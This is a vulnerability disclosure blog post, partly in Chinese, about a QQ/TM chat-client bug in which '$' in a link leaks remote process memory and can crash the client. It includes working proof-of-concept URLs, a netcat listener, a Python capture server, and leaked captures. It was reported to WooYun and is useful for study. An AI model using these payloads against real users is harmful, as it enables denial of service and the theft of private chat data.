Tencent QQ / TM remote memory-read vulnerability: can lead to remote overflow and denial of service

Tencent QQ / TM chat-window vulnerability: remotely reading the other party's process memory, possibly leading to remote overflow and denial-of-service attacks

Vulnerability description:

I don't really know how to define this or what to call it, so let's go with that name for now...

This bug is pretty absurd, and the way I found it was pure coincidence.

Some links on this site were blocked by the great GFW, so this morning I changed all the links to a rather ugly format...

For example: https://lcx.cc/?$=1910 (because of some compatibility problems it has since been changed to something else...)

Then in the afternoon I posted a link in a QQ group, and right away a lot of people reported that QQ crashed or that the link could not be opened, as in the screenshot below:

[Screenshot: Tencent QQ / TM chat window remotely reading the other party's process memory]

That made me curious, so I checked by hand and found something odd, as below:

[Screenshot: Tencent QQ / TM remote memory-read vulnerability]

Clearly the URL that was opened was completely wrong, and a string of strange characters had been appended to it...

That got me interested, so I played around with it for a while and reached the conclusions below...

Vulnerability test:

Test environment: TM2009 Beta3.2 + IE9 + Windows 7 Ultimate 32-bit

As it turned out, the conclusions have nothing to do with the test environment; it is purely an internal data-handling problem in QQ and TM. Both QQ and TM can be exploited, and some versions of QQ crash outright!!

Now the test method. Tools needed: two penguins (QQ accounts) and NC or anything else that can act as a temporary web server...

Run: nc -l -p 80, you know the drill...

Then open two chat windows and send the following string from one of them:

http://192.168.1.2/$0000

Then open that URL in the other, receiving chat window (actually the URL can be opened in either window; both trigger the bug)

[Screenshot: Tencent QQ / TM remote memory-read vulnerability]

You will be surprised to find:

GET /root@lcx.cc%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

[Screenshot: Tencent QQ / TM remote memory-read vulnerability]

The URL has turned into: http://192.168.1.2/root@lcx.cc%3E. Holy shit!

What on earth is the trailing root@lcx.cc>???? (I later concluded it is the other party's QQ account...)

Still confused. OK, keep testing:

http://192.168.1.2/$1 returns:

GET /para%E8%A3%9C%E2%88%A5 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

And what is para%E8%A3%9C%E2%88%A5?? OK, keep going:

http://192.168.1.2/$000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Returns:

GET /7620ACE1-9C90-4E6A-9571-FE57A6A6DE69%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

7620ACE1-9C90-4E6A-9571-FE57A6A6DE69>,Yoooooooooooooooooooooo~ What The Fuck!

继续:

http://192.168.1.2/$000

http://192.168.1.2/$=000

http://192.168.1.2/$=00

返回:

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

哦呵呵呵呵呵呵,目测企鹅已经内部混乱了,我们继续,屌不炸,誓不罢休,哈哈哈哈……

http://192.168.1.2/$1111111100000000,返回:/link%3E,Url 解码为:/link>,是不是有点像Html标签?而且貌似还是超链接标签?继续……

http://192.168.1.2/$%E5%B1%8C%E7%82%B8%EF%BC%81,返回:

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

platform:CF_Only_Open_Safe_URL,越来越接近真相了哦,亲~

http://192.168.1.2/$%01%02%03%04%04%05%06%07%08%08%08%08%08%08%08%08%08%08%08%08%08%08

GET /%DF%8FPYD%DF%8F/hL%DF%8F%E7%8C%80%E7%90%80T%DF%8F%E6%A0%80%E6%BC%80/%DF%8F%E4%8C%80%E7%94%80d%DF%8F%E6%A0%80%E6%A4%80l%DF%8F%E7%8C%80%E6%94%80t%DF%8F%E2%BC%80%EF%BF%BD%7C%DF%8F%0Cs%C2%84%DF%8FTi%C2%8C%DF%8F HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

This time the penguin spat out a big chunk. What it is I'll explain later; keep torturing the penguin...

http://192.168.1.2/$0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Guess what came back? Look:

http://192.168.1.2/tr%20bkIndex=1%20bgColor=#fbfafa%20id=itemId_32%20onclick=SetCurSel(this)%20ondblclick%20='OnDbClickItem(this)'%20dCount=0><td><table%20cellspacing='0'%20cellpadding='0'><tr><td%20width='183'><object%20classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119'%20class=imgHead><param%20name='src'%20value='platformdata:Head\1.png'></object>306797777</td><td%20width='183'>306797777<td>2012/3/11%2010:47:52</td></tr></table></td></tr>

URL-decoded:

http://192.168.1.2/tr bkIndex=1 bgColor=#fbfafa id=itemId_32 onclick=SetCurSel(this) ondblclick ='OnDbClickItem(this)' dCount=0><td><table cellspacing='0' cellpadding='0'><tr><td width='183'><object classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119' class=imgHead><param name='src' value='platformdata:Head\1.png'></object>306797777</td><td width='183'>306797777<td>2012/3/11 10:47:52</td></tr></table></td></tr>

Hahahaha, the raw HTML of the penguin's chat box!!! (The penguin's chat box is built on HTML)

The penguin is about to burst; continuing...

http://192.168.1.2/$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

[Screenshot: Tencent QQ / TM remote memory-read vulnerability]

http://192.168.1.2/$888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888880

Returns:

http://192.168.1.2/items%3E%3Citem%20title=%22一个月未登录%22%20tips=%22该分组中一个月未登录好友%22%20value=%2231%22%20/%3E%3Citem%20title=%22三个月未登录%22%20tips=%22该分组中三个月未登录好友%22%20value=%2291%22%20/%3E%3Citem%20title=%22半年未登录%22%20tips=%22该分组中半年未登录好友%22%20value=%22184%22%20/%3E%3C/items%3E???

URL-decoded:

items><item title="一个月未登录" tips="该分组中一个月未登录好友" value="31" /><item title="三个月未登录" tips="该分组中三个月未登录好友" value="91" /><item title="半年未登录" tips="该分组中半年未登录好友" value="184" /></items>???

Heh, what kind of data is this???

Returned data:

http://192.168.1.2//A%3E%3C/font%3E%3Cfont%20style=%22font-size:20pt;font-family:'微软雅黑','MS%20Sans%20Serif',sans-serif;%22%20color='800040'%3E%3Cbr%3E%3Cbr%3E打开该链接……%3C/font%3E

URL-decoded:

http://192.168.1.2//A></font><font style="font-size:20pt;font-family:'微软雅黑','MS Sans Serif',sans-serif;" color='800040'><br><br>打开该链接……</font>

Hahaha, the HTML source of Tencent's "open link" dialog box...

Heh, and even better, right after that the penguin blew up in spectacular fashion. Oh yeah...

[Screenshot: Tencent QQ / TM remote memory-read vulnerability]

After restarting QQ, I sent the 2048 bytes of the digit 8 again:

GET /Canvas%3E%3Cbackground%3E%3CTexture%20colorize=%22true%22%20file=%22com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png%22%20drawMode=%229Grid%22/%3E%3C/background%3E%3CTexture%20file=%22com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png%22%20Canvas.autoHeight=%22true%22%20Canvas.autoWidth=%22true%22%20Canvas.anchor=%22RIGHTCENTER%22%20Canvas.margin=%220,0,-5,-13%22/%3E%3C/Canvas%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

[Screenshot: Tencent QQ / TM remote memory-read vulnerability]

/Canvas><background><Texture colorize="true" file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png" drawMode="9Grid"/></background><Texture file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png" Canvas.autoHeight="true" Canvas.autoWidth="true" Canvas.anchor="RIGHTCENTER" Canvas.margin="0,0,-5,-13"/></Canvas>

Heh, Tencent's memory is leaking...

I'll stop testing here; by analogy there are many more...
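To make the captures above easier to reproduce and sort through, here is an added example (mine, not code from this post or from Tencent) that replaces the `nc -l -p 80` listener with a tiny logging HTTP server and labels each request path by what the leaked bytes look like: a GUID, an account-style address, markup from the chat window, control/invalid bytes, or something else. The sample paths are constructed from the requests shown in this post (the long ones abridged); the labels and regexes are my own choice.

```python
import re
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Request paths constructed from the captures in this post (long ones abridged).
SAMPLE_PATHS = [
    "/root@lcx.cc%3E",
    "/para%E8%A3%9C%E2%88%A5",
    "/7620ACE1-9C90-4E6A-9571-FE57A6A6DE69%3E",
    "/link%3E",
    "/%DF%8FPYD%DF%8F/hL%DF%8F%E7%8C%80%EF%BF%BD%7C%DF%8F%0Cs%C2%84%DF%8F",
    "/Canvas%3E%3Cbackground%3E%3CTexture%20colorize=%22true%22/%3E%3C/Canvas%3E",
]

GUID_RE = re.compile(r"^[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")
ADDR_RE = re.compile(r"^[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def decode_path(path):
    """Percent-decode the request path; bytes that are not valid UTF-8 become U+FFFD
    rather than being dropped, so binary leaks stay visible."""
    return urllib.parse.unquote(path.lstrip("/"), errors="replace")


def classify(path):
    """Label what the leaked bytes look like. A GUID or address is tested before the
    generic markup test because most leaks end in a stray '>' anyway."""
    text = decode_path(path)
    if GUID_RE.match(text):
        return "guid"
    if ADDR_RE.match(text):
        return "address"
    if any(ord(c) < 0x20 or 0x7F <= ord(c) < 0xA0 or c == "\ufffd" for c in text):
        return "binary"
    if "<" in text or ">" in text:
        return "markup"
    return "other"


def triage(paths):
    """Map each captured path to (label, decoded text)."""
    return {p: (classify(p), decode_path(p)) for p in paths}


class CaptureHandler(BaseHTTPRequestHandler):
    """Stand-in for `nc -l -p 80`: print one labelled line per request, answer 200."""

    def do_GET(self):
        label, text = classify(self.path), decode_path(self.path)
        print(f"{self.client_address[0]} {label}: {text!r}")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"captured\n")

    def log_message(self, format, *args):
        pass  # keep stdout to our own one-line summaries


def serve(port=80):
    """Listen like netcat did in the post (port 80 needs privileges on most systems)."""
    HTTPServer(("0.0.0.0", port), CaptureHandler).serve_forever()


if __name__ == "__main__":
    for label, text in triage(SAMPLE_PATHS).values():
        print(f"{label:8} {text!r}")
    # serve()  # uncomment to capture live requests instead of the samples
```

Running the file prints the labelled samples; calling serve() turns it into the listener used in the test procedure, so each request the client sends arrives already decoded and categorised instead of as a raw percent-encoded line.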

Cause of the vulnerability:

I'm no reverse-engineering guru, so the exact cause is unknown...

But by the looks of it, when Tencent opens a URL its string handling goes wrong on the special character "$" (dollar sign) and produces a calculation error; exactly how is currently unknown.

What the results do show is that the string length is miscalculated, so the read is "misaligned" in memory: an unrelated block of memory is read out, assembled into a URL, and then handed to the default browser to open...

That is how this annoying bug arises, and because a bad memory read is dangerous, it crashes easily...

And then you have a remote denial of service...

Unfortunately the memory location this bug reads does not appear to be controllable; at least it is hard to pin down, although some strings are read from fixed positions.

During testing it was sometimes the other party's nickname or QQ number, sometimes chat history, sometimes some QQ number from a group, and sometimes garbage (meaningless data from some memory location)...

In testing, only this one special character seems to have an effect; every other special character behaves normally.

Any data can follow the character, whatever you like; it just fills the position and throws off Tencent's calculation. The more the better; digits seem to work best, while letters and other characters sometimes have no effect.
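The explanation above is a hypothesis (miscalculated length, read lands on neighbouring memory), and the following added example is a hypothetical model of that bug class, written by me; it is not Tencent's code and the "$ makes the digit run count twice" rule is invented purely so that a longer padding produces a longer overrun, as the author observed. It shows why the bytes that reach the browser are whatever happened to be allocated next to the URL, why a large enough padding turns the leak into a crash, and what the correct routine does differently: take the length from the real terminator and refuse anything that is not URL-safe.

```python
# Hypothetical model of a length/copy mismatch (added example, not Tencent's code).
NEIGHBOUR = b"<tr bkIndex=1 id=itemId_32>306797777</tr>"  # constructed: bytes allocated after the URL


def build_heap(url):
    """Lay the NUL-terminated URL out directly in front of a neighbouring allocation."""
    return url + b"\x00" + NEIGHBOUR


def buggy_measure(url):
    """Invented faulty length rule: after a '$' the run of digits is counted twice.
    It stands in for 'the length calculation goes wrong on $'; the real rule is unknown."""
    n = i = 0
    while i < len(url):
        if url[i:i + 1] == b"$":
            j = i + 1
            while j < len(url) and url[j:j + 1].isdigit():
                j += 1
            n += 1 + 2 * (j - i - 1)  # '$' once, the digits twice
            i = j
        else:
            n += 1
            i += 1
    return n


def open_url_vulnerable(heap, url):
    """Copy buggy_measure(url) bytes from the start of the URL, never checking the real end.
    Slicing past the URL returns the neighbour's bytes; past the mapped region a real
    process faults, which is modelled here as MemoryError."""
    n = buggy_measure(url)
    if n > len(heap):
        raise MemoryError("read ran off the end of mapped memory (the crash described in the post)")
    return heap[:n]


def leaked_bytes(url):
    """Bytes beyond the URL's own terminator that the vulnerable copy hands to the browser."""
    return open_url_vulnerable(build_heap(url), url)[len(url) + 1:]


def open_url_fixed(heap):
    """Take the length from the real terminator and reject anything that is not URL-safe."""
    url = heap[:heap.index(b"\x00")]
    if not url.startswith((b"http://", b"https://")):
        raise ValueError("refusing to open a non-http URL")
    if any(c < 0x21 or c > 0x7E for c in url):
        raise ValueError("refusing to open a URL containing control or non-ASCII bytes")
    return url


if __name__ == "__main__":
    for url in (b"http://192.168.1.2/", b"http://192.168.1.2/$0000", b"http://192.168.1.2/$00000000"):
        print(url, "-> leaked:", leaked_bytes(url))
    print("fixed:", open_url_fixed(build_heap(b"http://192.168.1.2/$00000000")))
```

With no "$" the two length rules agree and nothing leaks; four padding digits pull three neighbouring bytes into the URL, eight digits pull seven, and a hundred digits run off the end of the model heap. The fixed routine never measures the padding at all, which is the property a real fix has to have regardless of what the actual miscalculation turns out to be.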

Exploitation:

The other party's process memory can be read remotely. All you need is a simple web server listening on port 80; anything will do...

At the moment it can only read at random. Hoping a reverse-engineering expert takes a look: if the read position could be precisely controlled, reading keys out of the other party's memory would be within reach, you know...

Also, this bug seems able to overwrite part of memory, so it may lead to a remote overflow...

That's all. Fuck Gov...

Submitted to WooYun:

http://www.wooyun.org/bugs/wooyun-2010-05420/trace/af7f56ec622d95a4061760123db346ba

http://www.wooyun.org/bugs/wooyun-2012-05420

Comments (old system):

鬼哥 @ 2012-03-20 23:02:22

Tested QQ2011; it doesn't have this problem.

Site reply:

QQ2011 and QQ2012 don't have this problem; others untested.